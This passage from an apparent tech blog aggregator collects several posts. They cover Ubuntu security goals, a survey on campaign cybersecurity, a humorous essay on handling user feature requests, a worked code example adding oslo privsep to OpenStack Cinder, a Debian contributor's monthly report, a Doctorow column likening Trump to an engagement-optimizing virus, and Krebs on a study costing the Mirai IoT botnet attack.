If I had one big thing that I could feel great about doing, systematically, for everyone who uses Ubuntu, it would be improving their confidence in the security of their systems and their data. It’s one of the very few truly unifying themes that crosses every use case.

It’s extraordinary how diverse the uses are to which the world puts Ubuntu these days, from the heart of the mainframe operation in a major financial firm, to the raspberry pi duct-taped to the back of a prototype something in the middle of nowhere, from desktops to clouds to connected things, we are the platform for ambitions great and small. We are stewards of a shared platform, and one of the ways we respond to that diversity is by opening up to let people push forward their ideas, making sure only that they are excellent to each other in the pushing.

But security is the one thing that every community wants – and it’s something that, on reflection, we can raise the bar even higher on.

So without further ado: thank you to everyone who helped bring about Bionic, and may you all enjoy working towards your own goals both in and out of Ubuntu in the next two years.

CryptogramThe US Is Unprepared for Election-Related Hacking in 2018

This survey and report is not surprising:

The survey of nearly forty Republican and Democratic campaign operatives, administered through November and December 2017, revealed that American political campaign staff -- primarily working at the state and congressional levels -- are not only unprepared for possible cyber attacks, but remain generally unconcerned about the threat. The survey sample was relatively small, but nevertheless the survey provides a first look at how campaign managers and staff are responding to the threat.

The overwhelming majority of those surveyed do not want to devote campaign resources to cybersecurity or to hire personnel to address cybersecurity issues. Even though campaign managers recognize there is a high probability that campaign and personal emails are at risk of being hacked, they are more concerned about fundraising and press coverage than they are about cybersecurity. Less than half of those surveyed said they had taken steps to make their data secure and most were unsure if they wanted to spend any money on this protection.

Security is never something we actually want. Security is something we need in order to avoid what we don't want. It's also more abstract, concerned with hypothetical future possibilities. Of course it's lower on the priorities list than fundraising and press coverage. They're more tangible, and they're more immediate.

This is all to the attackers' advantage.

Worse Than FailureYes == No

For decades, I worked in an industry where you were never allowed to say no to a user, no matter how ridiculous the request. You had to suck it up and figure out a way to deliver on insane requests, regardless of the technical debt they inflicted.

Users are a funny breed. They say things like I don't care if the input dialog you have works; the last place I worked had a different dialog to do the same thing, and I want that dialog here! With only one user saying stuff like that, it's semi-tolerable. When you have 700+ users and each of them wants a different dialog to do the same thing, and nobody in management will say no, you need to start creating table-driven dialogs (x-y coordinates, width, height, label phrasing, field layout within the dialog, different input formats, fonts, colors and so forth). Multiply that by the number of dialogs in your application and it becomes needlessly pointlessly impossibly difficult.

But it never stops there. Often, one user will request that you move a field from another dialog onto their dialog - just for them. This creates all sorts of havoc with validation logic. Multiply it by hundreds of users and you're basically creating a different application for each of them - each with its own validation logic, all in the same application.

After just a single handful of users demanding changes like this, it can quickly become a nightmare. Worse, once it starts, the next user to whom you say no tells you that you did it for the other guy and so you have to do it for them too! After all, each user is the most important user, right?

It doesn't matter that saying no is the right thing to do. It doesn't matter that it will put a zero-value load on development and debugging time. It doesn't matter that sucking up development time to do it means there are fewer development hours for bug fixes or actual features.

When management refuses to say no, it can turn your code into a Pandora's-Box-o-WTF™

However, there is hope. There is a way to tell the users no without actually saying no. It's by getting them to say it for you and then withdrawing their urgent, can't-live-without-it, must-have-or-the-world-will-end request.

You may ask how?

The trick is to make them see the actual cost of implementing their teeny tiny little feature.

Yes, we can add that new button to provide all the functionality of Excel in an in-app
calculator, but it will take x months (years) to do it, AND it will push back all of the
other features in the queue. Shall I delay the next release and the other feature requests
so we can build this for you, or would you like to schedule it for a future release?

Naturally you'll have to answer questions like "But it's just a button; why would it take that much effort?"

This is a good thing because it forces them down the rabbit hole into your world where you are the expert. Now you get to explain to them the realities of software development, and the full cost of their little request.

Once they realize the true cost that they'd have to pay, the urgency of the request almost always subsides to nice to have and gets pushed forward so as to not delay the scheduled release.

And because you got them to say it for you, you didn't have to utter the word no.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

Planet Linux AustraliaMichael Still: Adding oslo privsep to a new project, a worked example

You’ve decided that using sudo to run command lines as root is lame and that it is time to step up and do things properly. How do you do that? Well, here’s a simple guide to adding oslo privsep to your project!

In a previous post I showed you how to add a new method that ran with escalated permissions. However, that’s only helpful if you already have privsep added to your project. This post shows you how to do that thing to your favourite python project. In this case we’ll use OpenStack Cinder as a worked example.

Note that Cinder already uses privsep because of its use of os-brick, so the instructions below skip adding oslo.privsep to requirements.txt. If your project has never ever used privsep at all, you’ll need to add a line like this to requirements.txt:

oslo.privsep

For reference, this post is based on OpenStack review 566,479, which I wrote as an example of how to add privsep to a new project. If you’re after a complete worked example in a more complete form than this post then the review might be useful to you.

As a first step, let’s add the code we’d want to write to actually call something with escalated permissions. In the Cinder case I chose the cgroups throttling code for this example. So first off we’d need to create the privsep directory with the relevant helper code:

diff --git a/cinder/privsep/__init__.py b/cinder/privsep/__init__.py
new file mode 100644
index 0000000..7f826a8
--- /dev/null
+++ b/cinder/privsep/__init__.py
@@ -0,0 +1,32 @@
+# Copyright 2016 Red Hat, Inc
+# Copyright 2017 Rackspace Australia
+# Copyright 2018 Michael Still and Aptira
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may
+# not use this file except in compliance with the License. You may obtain
+# a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+# License for the specific language governing permissions and limitations
+# under the License.
+
+"""Setup privsep decorator."""
+
+from oslo_privsep import capabilities
+from oslo_privsep import priv_context
+
+sys_admin_pctxt = priv_context.PrivContext(
+ 'cinder',
+ cfg_section='cinder_sys_admin',
+ pypath=__name__ + '.sys_admin_pctxt',
+ capabilities=[capabilities.CAP_CHOWN,
+ capabilities.CAP_DAC_OVERRIDE,
+ capabilities.CAP_DAC_READ_SEARCH,
+ capabilities.CAP_FOWNER,
+ capabilities.CAP_NET_ADMIN,
+ capabilities.CAP_SYS_ADMIN],
+)

This code defines the permissions that our context (called cinder_sys_admin in this case) has. These specific permissions in the example above should correlate with those that you’d get if you ran a command with sudo. There was a bit of back and forth about what permissions to use and how many contexts to have while we were implementing privsep in OpenStack Nova, but we’ll discuss those in a later post.

Next we need the code that actually does the privileged thing:

diff --git a/cinder/privsep/cgroup.py b/cinder/privsep/cgroup.py
new file mode 100644
index 0000000..15d47e0
--- /dev/null
+++ b/cinder/privsep/cgroup.py
@@ -0,0 +1,35 @@
+# Copyright 2016 Red Hat, Inc
+# Copyright 2017 Rackspace Australia
+# Copyright 2018 Michael Still and Aptira
+#
+#    Licensed under the Apache License, Version 2.0 (the "License"); you may
+#    not use this file except in compliance with the License. You may obtain
+#    a copy of the License at
+#
+#         http://www.apache.org/licenses/LICENSE-2.0
+#
+#    Unless required by applicable law or agreed to in writing, software
+#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
+#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
+#    License for the specific language governing permissions and limitations
+#    under the License.
+
+"""
+Helpers for cgroup related routines.
+"""
+
+from oslo_concurrency import processutils
+
+import cinder.privsep
+
+
+@cinder.privsep.sys_admin_pctxt.entrypoint
+def cgroup_create(name):
+    processutils.execute('cgcreate', '-g', 'blkio:%s' % name)
+
+
+@cinder.privsep.sys_admin_pctxt.entrypoint
+def cgroup_limit(name, rw, dev, bps):
+    processutils.execute('cgset', '-r',
+                         'blkio.throttle.%s_bps_device=%s %d' % (rw, dev, bps),
+                         name)

Here we just provide two methods which manipulate cgroups. That allows us to make this change to the throttling implementation in Cinder:

diff --git a/cinder/volume/throttling.py b/cinder/volume/throttling.py
index 39cbbeb..3c6ddaa 100644
--- a/cinder/volume/throttling.py
+++ b/cinder/volume/throttling.py
@@ -22,6 +22,7 @@ from oslo_concurrency import processutils
 from oslo_log import log as logging
 
 from cinder import exception
+import cinder.privsep.cgroup
 from cinder import utils
 
 
@@ -65,8 +66,7 @@ class BlkioCgroup(Throttle):
         self.dstdevs = {}
 
         try:
-            utils.execute('cgcreate', '-g', 'blkio:%s' % self.cgroup,
-                          run_as_root=True)
+            cinder.privsep.cgroup.cgroup_create(self.cgroup)
         except processutils.ProcessExecutionError:
             LOG.error('Failed to create blkio cgroup \'%(name)s\'.',
                       {'name': cgroup_name})
@@ -81,8 +81,7 @@ class BlkioCgroup(Throttle):
 
     def _limit_bps(self, rw, dev, bps):
         try:
-            utils.execute('cgset', '-r', 'blkio.throttle.%s_bps_device=%s %d'
-                          % (rw, dev, bps), self.cgroup, run_as_root=True)
+            cinder.privsep.cgroup.cgroup_limit(self.cgroup, rw, dev, bps)
         except processutils.ProcessExecutionError:
             LOG.warning('Failed to setup blkio cgroup to throttle the '
                         'device \'%(device)s\'.', {'device': dev})

These last two snippets should be familiar from the previous post about privsep in this series. Finally, for the actual implementation of privsep, we need to make sure that rootwrap has permissions to start the privsep helper daemon. You’ll get one daemon per unique security context, but in this case we only have one of those so we’ll only need one rootwrap entry. Note that I also remove the previous rootwrap entries for cgcreate and cgset while I’m here.

diff --git a/etc/cinder/rootwrap.d/volume.filters b/etc/cinder/rootwrap.d/volume.filters
index abc1517..d2d1720 100644
--- a/etc/cinder/rootwrap.d/volume.filters
+++ b/etc/cinder/rootwrap.d/volume.filters
@@ -43,6 +43,10 @@ lvdisplay4: EnvFilter, env, root, LC_ALL=C, LVM_SYSTEM_DIR=, LVM_SUPPRESS_FD_WAR
 # This line ties the superuser privs with the config files, context name,
 # and (implicitly) the actual python code invoked.
 privsep-rootwrap: RegExpFilter, privsep-helper, root, privsep-helper, --config-file, /etc/(?!\.\.).*, --privsep_context, os_brick.privileged.default, --privsep_sock_path, /tmp/.*
+
+# Privsep calls within cinder iteself
+privsep-rootwrap-sys_admin: RegExpFilter, privsep-helper, root, privsep-helper, --config-file, /etc/(?!\.\.).*, --privsep_context, cinder.privsep.sys_admin_pctxt, --privsep_sock_path, /tmp/.*
+
 # The following and any cinder/brick/* entries should all be obsoleted
 # by privsep, and may be removed once the os-brick version requirement
 # is updated appropriately.
@@ -93,8 +97,6 @@ ionice_1: ChainingRegExpFilter, ionice, root, ionice, -c[0-3], -n[0-7]
 ionice_2: ChainingRegExpFilter, ionice, root, ionice, -c[0-3]
 
 # cinder/volume/utils.py: setup_blkio_cgroup()
-cgcreate: CommandFilter, cgcreate, root
-cgset: CommandFilter, cgset, root
 cgexec: ChainingRegExpFilter, cgexec, root, cgexec, -g, blkio:\S+
 
 # cinder/volume/driver.py

And because we’re not bad people we’d of course write a release note about the changes we’ve made…

diff --git a/releasenotes/notes/privsep-rocky-35bdfe70ed62a826.yaml b/releasenotes/notes/privsep-rocky-35bdfe70ed62a826.yaml
new file mode 100644
index 0000000..e78fb00
--- /dev/null
+++ b/releasenotes/notes/privsep-rocky-35bdfe70ed62a826.yaml
@@ -0,0 +1,13 @@
+---
+security:
+    Privsep transitions. Cinder is transitioning from using the older style
+    rootwrap privilege escalation path to the new style Oslo privsep path.
+    This should improve performance and security of Nova in the long term.
+  - |
+    privsep daemons are now started by Cinder when required. These daemons can
+    be started via rootwrap if required. rootwrap configs therefore need to
+    be updated to include new privsep daemon invocations.
+upgrade:
+  - |
+    The following commands are no longer required to be listed in your rootwrap
+    configuration: cgcreate; and cgset.

This code will now work. However, we’ve left out one critical piece of the puzzle — testing. If this code was uploaded like this, it would fail in the OpenStack gate, even though it probably passed on your desktop. This is because many of the gate jobs are setup in such a way that they can’t run rootwrapped commands, which in this case means that the rootwrap daemon won’t be able to start.

I found this quite confusing in Nova when I was implementing things and had missed a step. So I wrote a simple test fixture that warns me when I am being silly:

diff --git a/cinder/test.py b/cinder/test.py
index c8c9e6c..a49cedb 100644
--- a/cinder/test.py
+++ b/cinder/test.py
@@ -302,6 +302,9 @@ class TestCase(testtools.TestCase):
         tpool.killall()
         tpool._nthreads = 20
 
+        # NOTE(mikal): make sure we don't load a privsep helper accidentally
+        self.useFixture(cinder_fixtures.PrivsepNoHelperFixture())
+
     def _restore_obj_registry(self):
         objects_base.CinderObjectRegistry._registry._obj_classes = \
             self._base_test_obj_backup
diff --git a/cinder/tests/fixtures.py b/cinder/tests/fixtures.py
index 6e275a7..79e0b73 100644
--- a/cinder/tests/fixtures.py
+++ b/cinder/tests/fixtures.py
@@ -1,4 +1,6 @@
 # Copyright 2016 IBM Corp.
+# Copyright 2017 Rackspace Australia
+# Copyright 2018 Michael Still and Aptira
 #
 #    Licensed under the Apache License, Version 2.0 (the "License"); you may
 #    not use this file except in compliance with the License. You may obtain
@@ -21,6 +23,7 @@ import os
 import warnings
 
 import fixtures
+from oslo_privsep import daemon as privsep_daemon
 
 _TRUE_VALUES = ('True', 'true', '1', 'yes')
 
@@ -131,3 +134,29 @@ class WarningsFixture(fixtures.Fixture):
                     ' This key is deprecated. Please update your policy '
                     'file to use the standard policy values.')
         self.addCleanup(warnings.resetwarnings)
+
+
+class UnHelperfulClientChannel(privsep_daemon._ClientChannel):
+    def __init__(self, context):
+        raise Exception('You have attempted to start a privsep helper. '
+                        'This is not allowed in the gate, and '
+                        'indicates a failure to have mocked your tests.')
+
+
+class PrivsepNoHelperFixture(fixtures.Fixture):
+    """A fixture to catch failures to mock privsep's rootwrap helper.
+
+    If you fail to mock away a privsep'd method in a unit test, then
+    you may well end up accidentally running the privsep rootwrap
+    helper. This will fail in the gate, but it fails in a way which
+    doesn't identify which test is missing a mock. Instead, we
+    raise an exception so that you at least know where you've missed
+    something.
+    """
+
+    def setUp(self):
+        super(PrivsepNoHelperFixture, self).setUp()
+
+        self.useFixture(fixtures.MonkeyPatch(
+            'oslo_privsep.daemon.RootwrapClientChannel',
+            UnHelperfulClientChannel))

Now if you fail to mock a privsep’ed call, then you’ll get something like this:

==============================
Failed 1 tests - output below:
==============================

cinder.tests.unit.test_volume_throttling.ThrottleTestCase.test_BlkioCgroup
--------------------------------------------------------------------------

Captured traceback:
~~~~~~~~~~~~~~~~~~~
    Traceback (most recent call last):
      File "/srv/src/openstack/cinder/.tox/py27/local/lib/python2.7/site-packages/mock/mock.py", line 1305, in patched
        return func(*args, **keywargs)
      File "cinder/tests/unit/test_volume_throttling.py", line 66, in test_BlkioCgroup
        throttle = throttling.BlkioCgroup(1024, 'fake_group')
      File "cinder/volume/throttling.py", line 69, in __init__
        cinder.privsep.cgroup.cgroup_create(self.cgroup)
      File "/srv/src/openstack/cinder/.tox/py27/local/lib/python2.7/site-packages/oslo_privsep/priv_context.py", line 206, in _wrap
        self.start()
      File "/srv/src/openstack/cinder/.tox/py27/local/lib/python2.7/site-packages/oslo_privsep/priv_context.py", line 217, in start
        channel = daemon.RootwrapClientChannel(context=self)
      File "cinder/tests/fixtures.py", line 141, in __init__
        raise Exception('You have attempted to start a privsep helper. '
    Exception: You have attempted to start a privsep helper. This is not allowed in the gate, and indicates a failure to have mocked your tests.

The last bit is the most important. The fixture we installed has detected that you’ve failed to mock a privsep’ed call and has informed you. So, the last step of all is fixing our tests. This normally involves changing where we mock, as many unit tests just lazily mock the execute() call. I try to be more granular than that. Here’s what that looked like in this throttling case:

diff --git a/cinder/tests/unit/test_volume_throttling.py b/cinder/tests/unit/test_volume_throttling.py
index 82e2645..edbc2d9 100644
--- a/cinder/tests/unit/test_volume_throttling.py
+++ b/cinder/tests/unit/test_volume_throttling.py
@@ -29,7 +29,9 @@ class ThrottleTestCase(test.TestCase):
             self.assertEqual([], cmd['prefix'])
 
     @mock.patch.object(utils, 'get_blkdev_major_minor')
-    def test_BlkioCgroup(self, mock_major_minor):
+    @mock.patch('cinder.privsep.cgroup.cgroup_create')
+    @mock.patch('cinder.privsep.cgroup.cgroup_limit')
+    def test_BlkioCgroup(self, mock_limit, mock_create, mock_major_minor):
 
         def fake_get_blkdev_major_minor(path):
             return {'src_volume1': "253:0", 'dst_volume1': "253:1",
@@ -37,38 +39,25 @@ class ThrottleTestCase(test.TestCase):
 
         mock_major_minor.side_effect = fake_get_blkdev_major_minor
 
-        self.exec_cnt = 0
+        throttle = throttling.BlkioCgroup(1024, 'fake_group')
+        with throttle.subcommand('src_volume1', 'dst_volume1') as cmd:
+            self.assertEqual(['cgexec', '-g', 'blkio:fake_group'],
+                             cmd['prefix'])
 
-        def fake_execute(*cmd, **kwargs):
-            cmd_set = ['cgset', '-r',
-                       'blkio.throttle.%s_bps_device=%s %d', 'fake_group']
-            set_order = [None,
-                         ('read', '253:0', 1024),
-                         ('write', '253:1', 1024),
-                         # a nested job starts; bps limit are set to the half
-                         ('read', '253:0', 512),
-                         ('read', '253:2', 512),
-                         ('write', '253:1', 512),
-                         ('write', '253:3', 512),
-                         # a nested job ends; bps limit is resumed
-                         ('read', '253:0', 1024),
-                         ('write', '253:1', 1024)]
-
-            if set_order[self.exec_cnt] is None:
-                self.assertEqual(('cgcreate', '-g', 'blkio:fake_group'), cmd)
-            else:
-                cmd_set[2] %= set_order[self.exec_cnt]
-                self.assertEqual(tuple(cmd_set), cmd)
-
-            self.exec_cnt += 1
-
-        with mock.patch.object(utils, 'execute', side_effect=fake_execute):
-            throttle = throttling.BlkioCgroup(1024, 'fake_group')
-            with throttle.subcommand('src_volume1', 'dst_volume1') as cmd:
+            # a nested job
+            with throttle.subcommand('src_volume2', 'dst_volume2') as cmd:
                 self.assertEqual(['cgexec', '-g', 'blkio:fake_group'],
                                  cmd['prefix'])
 
-                # a nested job
-                with throttle.subcommand('src_volume2', 'dst_volume2') as cmd:
-                    self.assertEqual(['cgexec', '-g', 'blkio:fake_group'],
-                                     cmd['prefix'])
+        mock_create.assert_has_calls([mock.call('fake_group')])
+        mock_limit.assert_has_calls([
+            mock.call('fake_group', 'read', '253:0', 1024),
+            mock.call('fake_group', 'write', '253:1', 1024),
+            # a nested job starts; bps limit are set to the half
+            mock.call('fake_group', 'read', '253:0', 512),
+            mock.call('fake_group', 'read', '253:2', 512),
+            mock.call('fake_group', 'write', '253:1', 512),
+            mock.call('fake_group', 'write', '253:3', 512),
+            # a nested job ends; bps limit is resumed
+            mock.call('fake_group', 'read', '253:0', 1024),
+            mock.call('fake_group', 'write', '253:1', 1024)])

…and we’re done. This post has been pretty long so I am going to stop here for now. However, hopefully I’ve demonstrated that it’s actually not that hard to implement privsep in a project, even with some slight testing polish.

The post Adding oslo privsep to a new project, a worked example appeared first on Made by Mikal.

,

Planet DebianRaphaël Hertzog: My Free Software Activities in April 2018

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

pkg-security team

I improved the packaging of openvas-scanner and openvas-manager so that they mostly work out of the box with a dedicated redis database pre-configured and with certificates created in the postinst. I merged a patch for cross-build support in mac-robber and another patch from chkrootkit to avoid unexpected noise in quiet mode.

I prepared an update of openscap-daemon to fix the RC bug #896766 and to update to a new upstream release. I pinged the package maintainer to look into the autopkgtest failure (that I did not introduce). I sponsored hashcat 4.1.0.

Distro Tracker

While it slowed down, I continued to get merge requests. I merged two of them for some newcomer bugs:

I reviewed a merge request suggesting to add a “team search” feature.

I did some work of my own too: I fixed many exceptions that have been seen in production with bad incoming emails and with unexpected maintainer emails. I also updated the contributor guide to match the new workflow with salsa and with the new pre-generated database and its associated helper script (to download it and configure the application accordingly). During this process I also filed a GitLab issue about the latest artifact download URL not working as advertised.

I filed many issues (#13 to #19) for things that were only stored in my personal TODO list.

Misc Debian work

Bug Reports. I filed bug #894732 on mk-build-deps to filter build dependencies to include/install based on build profiles. For reprepro, I always found the explanation about FilterList very confusing (bug #895045). I filed and fixed a bug on mirrorbrain with redirection to HTTPS URLs.

I also investigated #894979 and concluded that the CA certificates keystore file generated with OpenJDK 9 is not working properly with OpenJDK 8. This got fixed in ca-certificates-java.

Sponsorship. I sponsored pylint-plugin-utils 0.2.6-2.

Packaging. I uploaded oca-core (still in NEW) and ccextractor for Freexian customers. I also uploaded python-num2words (dependency for oca-core). I fixed the RC bug #891541 on lua-posix.

Live team. I reviewed better handling of missing host dependency on live-build and reviewed a live-boot merge request to ensure that the FQDN returned by DHCP was working properly in the initrd.

Thanks

See you next month for a new summary of my activities.

Cory DoctorowDonald Trump is a pathogen evolved to thrive in an attention-maximization ecosystem


My latest Locus column is The Engagement-Maximization Presidency, and it proposes a theory to explain the political phenomenon of Donald Trump: we live in a world in which communications platforms amplify anything that gets “engagement” and provides feedback on just how much your message has been amplified so you can tune and re-tune for maximum amplification.


Peter Watts’s 2002 novel Maelstrom illustrates a beautiful, terrifying example of this, in which a mindless, self-modifying computer virus turns itself into a chatbot that impersonates patient zero in a world-destroying pandemic; even though the virus doesn’t understand what it’s doing or how it’s doing it, it’s able to use feedback to refine its strategies, gaining control over more resources with which to try more strategies.
It’s a powerful metaphor for the kind of cold reading we see Trump engaging in at his rallies, and for the presidency itself. I think it also explains why getting Trump off Twitter is impossible: it’s his primary feedback tool, and without it, he wouldn’t know what kinds of rhetoric to double down on and what to quietly sideline.

Maelstrom is concerned with a pandemic that is started by its protago­nist, Lenie Clark, who returns from a deep ocean rift bearing an ancient, devastating pathogen that burns its way through the human race, felling people by the millions.

As Clark walks across the world on a mission of her own, her presence in a message or news story becomes a signal of the utmost urgency. The filters and firewalls that give priority to some packets and suppress others as potentially malicious are programmed to give highest priority to any news that might pertain to Lenie Clark, as the authorities try to stop her from bringing death wherever she goes.

Here’s where Watts’s evolutionary biology shines: he posits a piece of self-modifying malicious software – something that really exists in the world today – that automatically generates variations on its tactics to find computers to run on and reproduce itself. The more computers it colonizes, the more strategies it can try and the more computational power it can devote to analyzing these experiments and directing its random walk through the space of all possible messages to find the strategies that penetrate more firewalls and give it more computational power to devote to its task.

Through the kind of blind evolution that produces predator-fooling false eyes on the tails of tropical fish, the virus begins to pretend that it is Lenie Clark, sending messages of increasing convincingness as it learns to impersonate patient zero. The better it gets at this, the more welcoming it finds the firewalls and the more computers it infects.

At the same time, the actual pathogen that Lenie Clark brought up from the deeps is finding more and more hospitable hosts to reproduce in, thanks to the computer virus, which is directing public health authorities to take countermeasures in all the wrong places. The more effective the computer virus is at neutralizing public health authorities, the more the biological virus spreads. The more the biological virus spreads, the more anxious the public health authorities become for news of its progress, and the more computers there are trying to suck in any intelligence that seems to emanate from Lenie Clark, supercharging the computer virus.

Together, this computer virus and biological virus co-evolve, symbiotes who cooperate without ever intending to, like the predator that kills the prey that feeds the scavenging pathogen that weakens other prey to make it easier for predators to catch them.


The Engagement-Maximization Presidency [Cory Doctorow/Locus]


(Image: Kevin Dooley, CC-BY; Trump’s Hair)

Krebs on SecurityStudy: Attack on KrebsOnSecurity Cost IoT Device Owners $323K

A monster distributed denial-of-service attack (DDoS) against KrebsOnSecurity.com in 2016 knocked this site offline for nearly four days. The attack was executed through a network of hacked “Internet of Things” (IoT) devices such as Internet routers, security cameras and digital video recorders. A new study that tries to measure the direct cost of that one attack for IoT device users whose machines were swept up in the assault found that it may have cost device owners a total of $323,973.75 in excess power and added bandwidth consumption.

My bad.

But really, none of it was my fault at all. It was mostly the fault of IoT makers for shipping cheap, poorly designed products (insecure by default), and the fault of customers who bought these IoT things and plugged them into the Internet without changing the things’ factory settings (passwords, at least).

The botnet that hit my site in Sept. 2016 was powered by the first version of Mirai, a malware strain that wriggles into dozens of IoT devices left exposed to the Internet and running with factory-default settings and passwords. Systems infected with Mirai are forced to scan the Internet for other vulnerable IoT devices, but they’re just as often used to help launch punishing DDoS attacks.

By the time of the first Mirai attack on this site, the young masterminds behind Mirai had already enslaved more than 600,000 IoT devices for their DDoS armies. But according to an interview with one of the admitted and convicted co-authors of Mirai, the part of their botnet that pounded my site was a mere slice of firepower they’d sold for a few hundred bucks to a willing buyer. The attack army sold to this ne’er-do-well harnessed the power of just 24,000 Mirai-infected systems (mostly security cameras and DVRs, but some routers, too).

These 24,000 Mirai devices clobbered my site for several days with data blasts of up to 620 Gbps. The attack was so bad that my pro-bono DDoS protection provider at the time — Akamai — had to let me go because the data firehose pointed at my site was starting to cause real pain for their paying customers. Akamai later estimated that the cost of maintaining protections around my site in the face of that onslaught would have run into the millions of dollars.

We’re getting better at figuring out the financial costs of DDoS attacks to the victims (5-, 6- or 7-digit dollar losses) and to the perpetrators (zero to hundreds of dollars). According to a report released this year by DDoS mitigation giant NETSCOUT Arbor, fifty-six percent of organizations last year experienced a financial impact from DDoS attacks of between $10,000 and $100,000, almost double the proportion from 2016.

But what if there were also a way to work out the cost of these attacks to the users of the IoT devices which get snared by DDoS botnets like Mirai? That’s what researchers at the University of California, Berkeley School of Information sought to determine in their new paper, “rIoT: Quantifying Consumer Costs of Insecure Internet of Things Devices.”

If we accept the UC Berkeley team’s assumptions about costs borne by hacked IoT device users (more on that in a bit), the total cost of added bandwidth and energy consumption from the botnet that hit my site came to $323,973.75. This may sound like a lot of money, but remember that broken down among 24,000 attacking drones the per-device cost comes to just $13.50.
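
As a quick sanity check of that per-device figure, here is the back-of-envelope arithmetic (my own, using the totals quoted above rather than the study’s actual model):

    # Back-of-envelope check of the per-device cost, using the totals quoted
    # above; the inputs are assumptions taken from this post, not recomputed
    # from the rIoT paper itself.
    total_cost_usd = 323973.75   # estimated excess power + bandwidth cost
    num_devices = 24000          # Mirai-infected devices used in the attack

    per_device = total_cost_usd / num_devices
    print("Per-device cost: $%.2f" % per_device)   # roughly $13.50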

So let’s review: The attacker who wanted to clobber my site paid a few hundred dollars to rent a tiny portion of a much bigger Mirai crime machine. That attack would likely have cost millions of dollars to mitigate. The consumers in possession of the IoT devices that did the attacking probably realized a few dollars in losses each, if that. Perhaps forever unmeasured are the many Web sites and Internet users whose connection speeds are often collateral damage in DDoS attacks.

Image: UC Berkeley.

Anyone noticing a slight asymmetry here in either costs or incentives? IoT security is what’s known as an “externality,” a term used to describe “positive or negative consequences to third parties that result from an economic transaction. When one party does not bear the full costs of its actions, it has inadequate incentives to avoid actions that incur those costs.”

In many cases negative externalities are synonymous with problems that the free market has a hard time rewarding individuals or companies for fixing or ameliorating, much like environmental pollution. The common theme with externalities is that the pain points to fix the problem are so diffuse and the costs borne by the problem so distributed across international borders that doing something meaningful about it often takes a global effort with many stakeholders — who can hopefully settle upon concrete steps for action and metrics to measure success.

The paper’s authors explain the misaligned incentives on two sides of the IoT security problem:

-“On the manufacturer side, many devices run lightweight Linux-based operating systems that open doors for hackers. Some consumer IoT devices implement minimal security. For example, device manufacturers may use default username and password credentials to access the device. Such design decisions simplify device setup and troubleshooting, but they also leave the device open to exploitation by hackers with access to the publicly-available or guessable credentials.”

-“Consumers who expect IoT devices to act like user-friendly ‘plug-and-play’ conveniences may have sufficient intuition to use the device but insufficient technical knowledge to protect or update it. Externalities may arise out of information asymmetries caused by hidden information or misaligned incentives. Hidden information occurs when consumers cannot discern product characteristics and, thus, are unable to purchase products that reflect their preferences. When consumers are unable to observe the security qualities of software, they instead purchase products based solely on price, and the overall quality of software in the market suffers.”

The UC Berkeley researchers concede that their experiments — in which they measured the power output and bandwidth consumption of various IoT devices they’d infected with a sandboxed version of Mirai — suggested that the scanning and DDoSsing activity prompted by a Mirai malware infection added almost negligible amounts in power consumption for the infected devices.

Thus, most of the loss figures cited for the 2016 attack rely heavily on estimates of how much the excess bandwidth created by a Mirai infection might cost users directly, and as such I suspect the $13.50 per machine estimates are on the high side.

No doubt, some Internet users get online via an Internet service provider that includes a daily “bandwidth cap,” such that over-use of the allotted daily bandwidth amount can incur overage fees and/or relegate the customer to a slower, throttled connection for some period after the daily allotment is exceeded.

But for a majority of high-speed Internet users, the added bandwidth use from a router or other IoT device on the network being infected with Mirai probably wouldn’t show up as an added line charge on their monthly bills. I asked the researchers about the considerable wiggle factor here:

“Regarding bandwidth consumption, the cost may not ever show up on a consumer’s bill, especially if the consumer has no bandwidth cap,” reads an email from the UC Berkeley researchers who wrote the report, including Kim Fong, Kurt Hepler, Rohit Raghavan and Peter Rowland.

“We debated a lot on how to best determine and present bandwidth costs, as it does vary widely among users and ISPs,” they continued. “Costs are more defined in cases where bots cause users to exceed their monthly cap. But even if a consumer doesn’t directly pay a few extra dollars at the end of the month, the infected device is consuming actual bandwidth that must be supplied/serviced by the ISP. And it’s not unreasonable to assume that ISPs will eventually pass their increased costs onto consumers as higher monthly fees, etc. It’s difficult to quantify the consumer-side costs of unauthorized use — which is likely why there’s not much existing work — and our stats are definitely an estimate, but we feel it’s helpful in starting the discussion on how to quantify these costs.”

Measuring bandwidth and energy consumption may turn out to be a useful and accepted tool to help more accurately measure the full costs of DDoS attacks. I’d love to see these tests run against a broader range of IoT devices in a much larger simulated environment.

If the Berkeley method is refined enough to become accepted as one of many ways to measure actual losses from a DDoS attack, the reporting of such figures could make these crimes more likely to be prosecuted.

Many DDoS attack investigations go nowhere because targets of these attacks fail to come forward or press charges, making it difficult for prosecutors to prove any real economic harm was done. Since many of these investigations die on the vine for a lack of financial damages reaching certain law enforcement thresholds to justify a federal prosecution (often $50,000 – $100,000), factoring in estimates of the cost to hacked machine owners involved in each attack could change that math.

But the biggest levers for throttling the DDoS problem are in the hands of the people running the world’s largest ISPs, hosting providers and bandwidth peering points on the Internet today. Some of those levers I detailed in the “Shaming the Spoofers” section of The Democratization of Censorship, the first post I wrote after the attack and after Google had brought this site back online under its Project Shield program.

By the way, we should probably stop referring to IoT devices as “smart” when they start misbehaving within three minutes of being plugged into an Internet connection. That’s about how long your average cheapo, factory-default security camera plugged into the Internet has before getting successfully taken over by Mirai. In short, dumb IoT devices are those that don’t make it easy for owners to use them safely without being a nuisance or harm to themselves or others.

Maybe what we need to fight this onslaught of dumb devices are more network operators turning to ideas like IDIoT, a network policy enforcement architecture for consumer IoT devices that was first proposed in December 2017.  The goal of IDIoT is to restrict the network capabilities of IoT devices to only what is essential for regular device operation. For example, it might be okay for network cameras to upload a video file somewhere, but it’s definitely not okay for that camera to then go scanning the Web for other cameras to infect and enlist in DDoS attacks.

So what does all this mean to you? That depends on how many IoT things you and your family and friends are plugging into the Internet and your/their level of knowledge about how to secure and maintain these devices. Here’s a primer on minimizing the chances that your orbit of IoT things become a security liability for you or for the Internet at large.

